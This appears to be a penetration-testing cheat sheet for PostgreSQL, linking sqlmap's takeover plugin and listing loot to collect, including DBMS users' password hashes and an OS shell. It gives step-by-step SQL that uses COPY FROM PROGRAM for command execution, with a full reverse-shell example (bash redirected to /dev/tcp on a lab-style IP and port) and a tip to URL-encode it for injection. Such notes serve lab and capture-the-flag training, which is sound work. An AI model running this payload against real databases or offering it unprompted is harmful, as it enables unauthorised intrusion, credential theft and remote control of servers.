# PostgreSQL

### Compromising DB - \[sqlmap code]:

<https://github.com/sqlmapproject/sqlmap/blob/582bb2fec960db825478a54c0aabbd7ba551f1b8/plugins/dbms/postgresql/takeover.py><br>

### Properties:

* Nested Queries= query1;query2;...
* Interact with DB via cmd line: psql\
  quit: \q
* Loot:\
  1\. DBMS Version\
  2\. Database Content\
  3\. DBMS Users Password Hashes\
  4\. OS Shell

### OS Shell \[ v9.3–v14 ]:

1\. DROP TABLE IF EXISTS cmd\_exec;\
2\. CREATE TABLE cmd\_exec(cmd\_output text);\
3\. COPY cmd\_exec FROM PROGRAM '\<cmd>'\
For eg. COPY cmd\_exec FROM PROGRAM 'bash -c "/bin/bash -l > /dev/tcp/10.10.14.12/7909 0<&1 2>&1"'\
\&#xNAN;*Note: single quotes needed for command. URL encode the whole POST/GET data.*<br>